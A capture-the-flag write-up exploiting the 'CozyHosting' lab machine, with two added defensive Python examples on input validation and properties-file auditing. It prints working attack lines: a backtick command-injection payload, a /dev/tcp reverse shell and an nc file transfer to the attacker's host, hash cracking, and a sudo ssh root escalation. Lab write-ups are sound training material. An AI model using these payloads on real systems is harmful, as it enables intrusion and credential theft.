![[CozyHosting.png]]

Cozyhosting was a fun OSCP-like machine that educates the attacker on good enumeration and persistence. The machine starts with a webpage that has a Spring Boot actuator backend leading to an exposed session. The attacker is then able to log in as the admin user and exploit an RCE vulnerability within the webpage. The attacker then leverages the low-level user to analyze a file for credentials, leading to a higher-level user's credentials. The high-level user had a misconfigured sudo privilege allowing root access.

Starting with nmap, I'll go ahead and use my standard scan parameters: -sC to scan with default scripts, -sV for service and version detection, --min-rate to drastically increase its speed, and -oA to save my findings to output files.

![[Proving Grounds/carryover/nmap.png]]

```
nmap 10.129.7.4 -sV -sC --min-rate 10000 -oA nmap-out
```

I will update my /etc/hosts file since the output mentions it did not follow a redirect to cozyhosting.htb.

![[Hack The Box/CozyHosting/hostsfile.PNG]]

I will start by visiting the site, since it's the only open port I detected.

![[cozyhostingIndex.PNG]]

Didn't find anything with passive recon, except for a login page in the top left.

![[loginpanel.PNG]]

I tried basic creds like cozyhosting : password or admin : password but didn't get anywhere. I tried simple SQL injections among other web login tactics and started banging my head against the desk because I couldn't really find anything. I started up Feroxbuster to look for hidden pages, and nothing interesting appeared after letting it run for at least an hour.

![[Hack The Box/linkVortex/feroxbuster.png]]

Then I decided that maybe there was content on another subdomain, so I used ffuf to check. But it returned nothing as well.

![[ffuf.PNG]]

And nothing on gobuster; despite the image, I sat here for a while.

![[gobuster.PNG]]

I got stumped for a while and it started to hurt my confidence, until I tried dirsearch as a last resort.
![[dirsearch.PNG]]

I almost couldn't believe that this was correct, especially since it happened within seconds. So I checked it. I used the default wordlist with dirsearch, and clearly it contained something that the largest wordlist from SecLists didn't have.

![[actuator.PNG]]

I was so happy to see progress. It looks like this machine is using Spring Boot actuators to monitor the app and gather metrics.

"_/sessions_ lists HTTP sessions, given we are using Spring Session. _/beans_ returns all available beans in our _BeanFactory_. Unlike _/auditevents_, it doesn't support filtering. _/health_ summarizes the health status of our application. _/env_ returns the current environment properties. Additionally, we can retrieve single properties."

https://www.baeldung.com/spring-boot-actuators

I went through each of these and was really interested in what I found in sessions.

![[sessions.PNG]]

It's a cookie; I should be able to paste it into my browser and access the kanderson user's session.

![[cookie.PNG]]

Now navigate to /admin.

![[loggedinAdmin.PNG]]

And just like that, I bypassed the login. There is only one input block on this page; everything else doesn't work. I'll pass some values in to see what happens.

![[testtest.PNG]]

Nothing too exciting. Let me pass cozyhosting.htb as the hostname and leave the username blank.

![[hostnameashostname.PNG]]

That is interesting: take a look at the browser URL line. That looks a lot like what happens when you fat-finger an ssh command on a Linux terminal. The error output was put directly into the URL. Let's send this to the Repeater in Burp Suite to really see what's happening.

![[repeater.png]]

Then I'll go to the Repeater and click Send, leaving the same input values as before.

![[spill.PNG]]

Yes, I can confirm that the backend is simply running an ssh connect command. I started messing around with the inputs to see if I could get RCE, and I got it!
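A short aside on why the ssh wrapper behaves this way, as an added illustration in Python (my own code, not the CozyHosting application, whose source the write-up never shows). It assumes the backend splices the username into a command string handed to a shell, which is the behaviour the Repeater output suggests; the exact command shape, the regexes and the sample inputs are mine. It shows that the whitespace check observed later does nothing against `;` and backticks, and that an allowlist plus a shell-free argv closes the hole.

```python
"""Added illustration: vulnerable ssh-wrapper pattern beside a hardened one.
The command shape is assumed; nothing here is the application's real code."""
import re
import shlex
import subprocess

# Constructed inputs: an ordinary request, and the shape that broke the
# filter in the write-up (a ';' after the username, then a backticked command).
LEGIT = ("cozyhosting.htb", "kanderson")
INJECTED = ("cozyhosting.htb", "a;`id`")

# --- the vulnerable pattern (assumed shape) ---------------------------------
def build_shell_command(host: str, username: str) -> str:
    """String a naive wrapper would hand to `sh -c`. User input is spliced
    straight into shell syntax, so ';' and backticks get interpreted."""
    return f"ssh -o ConnectTimeout=5 {username}@{host}"

def naive_whitespace_filter(username: str) -> bool:
    """The only check the write-up observed: reject whitespace. It says
    nothing about ';', '`', '$(' or '|', so the injected input passes."""
    return not re.search(r"\s", username)

# --- the hardened pattern ---------------------------------------------------
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")  # POSIX-style login names
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$"
)

def validate_target(host: str, username: str) -> None:
    """Allowlist, not denylist: anything outside the expected alphabet fails."""
    if not USERNAME_RE.match(username):
        raise ValueError(f"rejected username {username!r}")
    if not HOST_RE.match(host):
        raise ValueError(f"rejected host {host!r}")

def build_safe_argv(host: str, username: str) -> list:
    """Argument vector for subprocess.run(argv) with no shell involved. The
    user@host string is one argv element, so shell metacharacters in it are
    never parsed, and validate_target() rejects them before that anyway."""
    validate_target(host, username)
    return ["ssh", "-o", "BatchMode=yes", "-o", "ConnectTimeout=5",
            f"{username}@{host}", "true"]

def quoted_shell_command(host: str, username: str) -> str:
    """If a shell were unavoidable, shlex.quote makes the input one literal
    word: the backticks survive as characters but are never evaluated."""
    return f"ssh -o ConnectTimeout=5 {shlex.quote(username + '@' + host)}"

def run_safe(host: str, username: str) -> subprocess.CompletedProcess:
    """Shown for shape only; not called below because it really connects."""
    return subprocess.run(build_safe_argv(host, username),
                          capture_output=True, text=True, timeout=10)

if __name__ == "__main__":
    for host, user in (LEGIT, INJECTED):
        print("naive filter accepts:", naive_whitespace_filter(user),
              "->", build_shell_command(host, user))
        try:
            print("hardened argv:", build_safe_argv(host, user))
        except ValueError as exc:
            print("hardened:", exc)
```

The point of `build_safe_argv` is that the fix is structural: no amount of character filtering on the username is as robust as never letting a shell see it at all.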
![[Hack The Box/Alert/RCE.png]]

Looks like using the semicolon after the username and then wrapping a command in backticks broke the filtering.

```
host=cozyhosting.htb&username=a;`id`
```

I went ahead and set up my listener on my machine.

```
nc -lvnp 443
```

I tried passing a good old bash reverse shell one-liner but had no success. The input cannot contain whitespace.

![[noWHite.PNG]]

I tried URL encoding with no success either. I had one more trick up my sleeve: I did happen to have a no-whitespace sh one-liner lying around.

```
host=10.129.7.4&username=a;`(sh)0>/dev/tcp/10.10.14.153/443`
```

Let's give that a run.

![[shell.PNG]]

Success! In order to get some functionality, this is what you need to run, step by step.

```
exec >&0
python3 -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z to background the shell
stty raw -echo && fg
reset
# answer the "Terminal type?" prompt from reset with:
screen
export TERM=xterm
```

And with that, I have a fully functional shell as app.

![[shellasApp.PNG]]

The user app doesn't have many permissions; it also doesn't have a home directory. But it has a directory in / that contains one large file, and I imagine that is the way forward. So I'll transfer this file to my local machine using nc. First I'll set up a listener on my local machine.

```
nc -lvnp 4444 > file.jar
```

Then I'll run this command on the victim.

```
nc 10.10.14.153 4444 -w 3 < cloudhosting-0.0.1.jar
```

I'll wait for the file to transfer, then check to see if I have it.

![[gotFile.PNG]]

And I got it! I want to go ahead and unzip it; I can do this using the jar command.

```
jar xf file.jar
```

Now I have 3 new directories: BOOT-INF, META-INF, and org. I spent a while digging through these files until I found something very interesting in BOOT-INF/classes/application.properties.

```
cat application.properties
```

![[credstosql.PNG]]

This is great! This will allow me to connect to the PostgreSQL database on the local host. I didn't know much about this process, so I had to do some research. I kept getting this error.
![[sqlError.PNG]]

After some research, it turns out you need to explicitly set 127.0.0.1 as the host.

![[psqlSuccess.PNG]]

That's more like it! I ran some basic queries to look for credentials: \l lists the databases, \c cozyhosting switches to the application's database, \dt shows its tables, and then I dump the users table.

```
\l
\c cozyhosting
\dt
SELECT * FROM users;
```

![[sqlQuery.PNG]]

![[creds.PNG]]

And there are some creds! I put the hashes into hashcat and managed to crack admin; couldn't crack kanderson though.

```
echo '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' > admin_hash
hashcat -m 3200 admin_hash /usr/share/wordlists/rockyou.txt
```

Cracked! manchesterunited. The only thing I can imagine is that these creds must be for josh, the only other user on the machine.

```
ssh josh@cozyhosting.htb
password: manchesterunited
```

![[loginasjosh.PNG]]

Success!! Grab the user flag!

![[userflg.PNG]]

Check for sudo privileges.

```
sudo -l
```

![[sudo-l.PNG]]

Ooof. I immediately run to [GTFObins](https://gtfobins.github.io/) and search for ssh, then scroll down to sudo, and it looks like I can get root with just one command. Easy day!

![[easyday.PNG]]

```
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```

And with that, I have root and the flag!

![[rootflg.PNG]]
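Looking back over the chain, two of its links were plain configuration problems in the app's own application.properties: actuator endpoints (including /actuator/sessions) exposed over the web, and database credentials stored as literals in the file I pulled out of the jar. The following is an added Python audit of a Spring Boot properties file, my own code rather than anything from the box; the two property files it checks are constructed, with a placeholder password, and the list of sensitive actuator endpoints and the assumed default of only `health` being exposed are my choices.

```python
"""Added example: audit a Spring Boot application.properties for exposed
actuator endpoints and plaintext secrets. Sample files are constructed."""
import re

# Actuator endpoints that leak sessions, environment, heap contents, etc.
# (assumed list; 'sessions' only exists when Spring Session is in use).
SENSITIVE_ACTUATORS = {"sessions", "env", "heapdump", "beans", "mappings",
                       "configprops", "threaddump", "loggers"}
SECRET_KEY_RE = re.compile(r"(password|secret|token|credential)", re.I)

# Constructed: the weak shape seen on this box (wildcard exposure, literal
# password) and a hardened equivalent (health/info only, env-var references).
WEAK = """\
server.port=8080
management.endpoints.web.exposure.include=*
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=EXAMPLE-PLAINTEXT-PASSWORD
"""

HARDENED = """\
server.port=8080
management.endpoints.web.exposure.include=health,info
management.endpoint.health.show-details=never
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=${DB_USER}
spring.datasource.password=${DB_PASSWORD}
"""

def parse_properties(text: str) -> dict:
    """Minimal key=value parser; skips blank lines and # / ! comments."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props

def exposed_actuators(props: dict) -> set:
    """Sensitive endpoints reachable over HTTP given include/exclude.
    Assumes the default include is 'health' when the key is absent."""
    include = props.get("management.endpoints.web.exposure.include", "health")
    exclude = {e.strip() for e in
               props.get("management.endpoints.web.exposure.exclude", "").split(",")
               if e.strip()}
    if include.strip() == "*":
        exposed = set(SENSITIVE_ACTUATORS) | {"health", "info"}
    else:
        exposed = {e.strip() for e in include.split(",") if e.strip()}
    return (exposed & SENSITIVE_ACTUATORS) - exclude

def plaintext_secrets(props: dict) -> list:
    """Secret-looking keys whose value is a literal, not a ${ENV_VAR} reference."""
    return sorted(k for k, v in props.items()
                  if SECRET_KEY_RE.search(k) and not re.fullmatch(r"\$\{[^}]+\}", v))

def audit(text: str) -> dict:
    """Run both checks over one properties file and return the findings."""
    props = parse_properties(text)
    return {"exposed_sensitive_actuators": sorted(exposed_actuators(props)),
            "plaintext_secrets": plaintext_secrets(props)}

if __name__ == "__main__":
    print("weak:    ", audit(WEAK))
    print("hardened:", audit(HARDENED))
```

Run against the weak file it reports every sensitive actuator plus the datasource password; against the hardened file it reports nothing. Moving the password to an environment variable does not make the database itself safer, but it keeps the credential out of any artifact (jar, backup, repository) that a low-privileged user can read.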